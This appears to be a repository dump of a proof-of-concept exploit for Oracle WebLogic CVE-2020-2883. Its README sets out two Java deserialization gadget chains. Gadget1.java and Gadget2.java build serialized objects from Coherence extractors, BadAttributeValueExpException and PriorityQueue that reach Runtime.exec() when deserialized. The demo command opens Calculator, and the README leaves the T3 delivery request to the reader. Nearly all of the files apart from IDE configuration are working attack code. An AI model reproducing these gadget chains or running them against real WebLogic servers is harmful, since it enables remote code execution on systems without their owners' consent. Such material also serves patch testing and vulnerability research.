├── .idea ├── $CACHE_FILE$ ├── .gitignore ├── compiler.xml ├── dictionaries ├── jarRepositories.xml ├── libraries │ └── lib.xml ├── misc.xml ├── uiDesigner.xml └── vcs.xml ├── README.md ├── pom.xml ├── src └── main │ └── java │ ├── Gadget1.java │ └── Gadget2.java └── weblogic_cve-2020-2883.iml /.idea/$CACHE_FILE$: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Android 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /.idea/compiler.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/dictionaries: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/jarRepositories.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 | 14 | 15 | 19 | 20 | -------------------------------------------------------------------------------- /.idea/libraries/lib.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # POC for weblogic CVE-2020-2883 2 | 3 | poc1: 4 | 5 | ```bash 6 | javax.management.BadAttributeValueExpException.readObject() 7 | com.tangosol.internal.sleepycat.persist.evolve.Mutations.toString() 8 | java.util.concurrent.ConcurrentSkipListMap$SubMap.size() 9 | java.util.concurrent.ConcurrentSkipListMap$SubMap.isBeforeEnd() 10 | java.util.concurrent.ConcurrentSkipListMap.cpr() 11 | com.tangosol.util.comparator.ExtractorComparator.compare() 12 | com.tangosol.util.extractor.ChainedExtractor.extract() 13 | com.tangosol.util.extractor.ReflectionExtractor().extract() 14 | Method.invoke() 15 | //... 16 | com.tangosol.util.extractor.ReflectionExtractor().extract() 17 | Method.invoke() 18 | Runtime.exec() 19 | ``` 20 | 21 | poc2: 22 | 23 | ```bash 24 | java.util.PriorityQueue.readObject() 25 | java.util.PriorityQueue.heapify() 26 | java.util.PriorityQueue.siftDown() 27 | java.util.PriorityQueue.siftDownUsingComparator() 28 | com.tangosol.util.extractor.AbstractExtractor.compare() 29 | com.tangosol.util.extractor.MultiExtractor.extract() 30 | com.tangosol.util.extractor.ChainedExtractor.extract() 31 | //... 32 | Method.invoke() 33 | //... 34 | Runtime.exec() 35 | ``` 36 | 37 | ## Cautious 38 | 39 | 1. 需要导入依赖的coherence包 40 | 2. T3的请求请自行构造 41 | 42 | 43 | ## Reference 44 | 45 | https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild 46 | -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.magic 8 | weblogic_cve-2020-2883 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 13 | org.apache.maven.plugins 14 | maven-compiler-plugin 15 | 16 | 6 17 | 6 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /src/main/java/Gadget1.java: -------------------------------------------------------------------------------- 1 | import com.sleepycat.persist.evolve.Mutations; 2 | import com.tangosol.coherence.reporter.extractor.ConstantExtractor; 3 | import com.tangosol.util.ValueExtractor; 4 | import com.tangosol.util.comparator.ExtractorComparator; 5 | import com.tangosol.util.extractor.ChainedExtractor; 6 | import com.tangosol.util.extractor.ReflectionExtractor; 7 | 8 | import javax.management.BadAttributeValueExpException; 9 | import java.io.*; 10 | import java.lang.reflect.Field; 11 | import java.util.concurrent.Callable; 12 | import java.util.concurrent.ConcurrentNavigableMap; 13 | import java.util.concurrent.ConcurrentSkipListMap; 14 | 15 | /** 16 | * javax.management.BadAttributeValueExpException.readObject() 17 | * com.tangosol.internal.sleepycat.persist.evolve.Mutations.toString() 18 | * java.util.concurrent.ConcurrentSkipListMap$SubMap.size() 19 | * java.util.concurrent.ConcurrentSkipListMap$SubMap.isBeforeEnd() 20 | * java.util.concurrent.ConcurrentSkipListMap.cpr() 21 | * com.tangosol.util.comparator.ExtractorComparator.compare() 22 | * com.tangosol.util.extractor.ChainedExtractor.extract() 23 | * com.tangosol.util.extractor.ReflectionExtractor().extract() 24 | * Method.invoke() 25 | * //... 26 | * com.tangosol.util.extractor.ReflectionExtractor().extract() 27 | * Method.invoke() 28 | * Runtime.exec() 29 | */ 30 | 31 | public class Gadget1 { 32 | 33 | public static void getObjectBytes() throws Exception { 34 | String command = "open /System/Applications/Calculator.app"; 35 | ValueExtractor[] valueExtractors = new ValueExtractor[]{ 36 | new ConstantExtractor(Runtime.class), 37 | new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}), 38 | new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}), 39 | new ReflectionExtractor("exec", new Object[]{command}) 40 | }; 41 | 42 | ChainedExtractor chainedExtractor = new ChainedExtractor(valueExtractors); 43 | 44 | ExtractorComparator extractorComparator = new ExtractorComparator(); 45 | Field m_extractor = extractorComparator.getClass().getDeclaredField("m_extractor"); 46 | m_extractor.setAccessible(true); 47 | m_extractor.set(extractorComparator, chainedExtractor); 48 | 49 | ConcurrentSkipListMap concurrentSkipListMap = new ConcurrentSkipListMap(); 50 | Field comparator = concurrentSkipListMap.getClass().getDeclaredField("comparator"); 51 | comparator.setAccessible(true); 52 | comparator.set(concurrentSkipListMap, extractorComparator); 53 | 54 | ConcurrentNavigableMap subMap = concurrentSkipListMap.subMap("foo", false, "bar", false); 55 | 56 | // crafted Mutations Object 57 | Mutations mutations = new Mutations(); 58 | Field renamers = mutations.getClass().getDeclaredField("renamers"); 59 | renamers.setAccessible(true); 60 | renamers.set(mutations, subMap); 61 | 62 | BadAttributeValueExpException val = new BadAttributeValueExpException(null); 63 | Field valfield = val.getClass().getDeclaredField("val"); 64 | valfield.setAccessible(true); 65 | valfield.set(val, mutations); 66 | 67 | Deserializer.deserialize(Serializer.serialize(val)); 68 | } 69 | 70 | public static void main(String[] args) throws Exception { 71 | getObjectBytes(); 72 | } 73 | 74 | static class Deserializer implements Callable { 75 | private final byte[] bytes; 76 | 77 | public Deserializer(byte[] bytes) { this.bytes = bytes; } 78 | 79 | public Object call() throws Exception { 80 | return deserialize(bytes); 81 | } 82 | 83 | public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException { 84 | final ByteArrayInputStream in = new ByteArrayInputStream(serialized); 85 | return deserialize(in); 86 | } 87 | 88 | public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException { 89 | final ObjectInputStream objIn = new ObjectInputStream(in); 90 | return objIn.readObject(); 91 | } 92 | } 93 | 94 | static class Serializer implements Callable { 95 | private final Object object; 96 | public Serializer(Object object) { 97 | this.object = object; 98 | } 99 | 100 | public byte[] call() throws Exception { 101 | return serialize(object); 102 | } 103 | 104 | public static byte[] serialize(final Object obj) throws IOException { 105 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 106 | serialize(obj, out); 107 | return out.toByteArray(); 108 | } 109 | 110 | public static void serialize(final Object obj, final OutputStream out) throws IOException { 111 | final ObjectOutputStream objOut = new ObjectOutputStream(out); 112 | objOut.writeObject(obj); 113 | } 114 | 115 | } 116 | 117 | } 118 | 119 | 120 | -------------------------------------------------------------------------------- /src/main/java/Gadget2.java: -------------------------------------------------------------------------------- 1 | import com.tangosol.coherence.reporter.extractor.ConstantExtractor; 2 | import com.tangosol.util.ValueExtractor; 3 | import com.tangosol.util.comparator.ExtractorComparator; 4 | import com.tangosol.util.extractor.ChainedExtractor; 5 | import com.tangosol.util.extractor.ReflectionExtractor; 6 | 7 | import java.io.*; 8 | import java.lang.reflect.Field; 9 | import java.util.PriorityQueue; 10 | import java.util.concurrent.Callable; 11 | 12 | /** 13 | * java.util.PriorityQueue.readObject() 14 | * java.util.PriorityQueue.heapify() 15 | * java.util.PriorityQueue.siftDown() 16 | * java.util.PriorityQueue.siftDownUsingComparator() 17 | * com.tangosol.util.extractor.AbstractExtractor.compare() 18 | * com.tangosol.util.extractor.MultiExtractor.extract() 19 | * com.tangosol.util.extractor.ChainedExtractor.extract() 20 | * //... 21 | * Method.invoke() 22 | * //... 23 | * Runtime.exec() 24 | */ 25 | 26 | public class Gadget2 { 27 | 28 | public static void main(String[] args) throws Exception { 29 | String command = "open /System/Applications/Calculator.app"; 30 | ValueExtractor[] valueExtractors = new ValueExtractor[]{ 31 | new ConstantExtractor(Runtime.class), 32 | new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}), 33 | new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}), 34 | new ReflectionExtractor("exec", new Object[]{command}) 35 | }; 36 | 37 | ChainedExtractor chainedExtractor = new ChainedExtractor(valueExtractors); 38 | 39 | ExtractorComparator extractorComparator = new ExtractorComparator(); 40 | Field m_extractor = extractorComparator.getClass().getDeclaredField("m_extractor"); 41 | m_extractor.setAccessible(true); 42 | m_extractor.set(extractorComparator, chainedExtractor); 43 | 44 | PriorityQueue priorityQueue = new PriorityQueue(); 45 | priorityQueue.add("foo"); 46 | priorityQueue.add("bar"); 47 | 48 | Field comparator = priorityQueue.getClass().getDeclaredField("comparator"); 49 | comparator.setAccessible(true); 50 | comparator.set(priorityQueue, extractorComparator); 51 | 52 | Deserializer.deserialize(Serializer.serialize(priorityQueue)); 53 | } 54 | 55 | static class Deserializer implements Callable { 56 | private final byte[] bytes; 57 | 58 | public Deserializer(byte[] bytes) { this.bytes = bytes; } 59 | 60 | public Object call() throws Exception { 61 | return deserialize(bytes); 62 | } 63 | 64 | public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException { 65 | final ByteArrayInputStream in = new ByteArrayInputStream(serialized); 66 | return deserialize(in); 67 | } 68 | 69 | public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException { 70 | final ObjectInputStream objIn = new ObjectInputStream(in); 71 | return objIn.readObject(); 72 | } 73 | } 74 | 75 | static class Serializer implements Callable { 76 | private final Object object; 77 | public Serializer(Object object) { 78 | this.object = object; 79 | } 80 | 81 | public byte[] call() throws Exception { 82 | return serialize(object); 83 | } 84 | 85 | public static byte[] serialize(final Object obj) throws IOException { 86 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 87 | serialize(obj, out); 88 | return out.toByteArray(); 89 | } 90 | 91 | public static void serialize(final Object obj, final OutputStream out) throws IOException { 92 | final ObjectOutputStream objOut = new ObjectOutputStream(out); 93 | objOut.writeObject(obj); 94 | } 95 | 96 | } 97 | } 98 | -------------------------------------------------------------------------------- /weblogic_cve-2020-2883.iml: -------------------------------------------------------------------------------- 1 | 2 | --------------------------------------------------------------------------------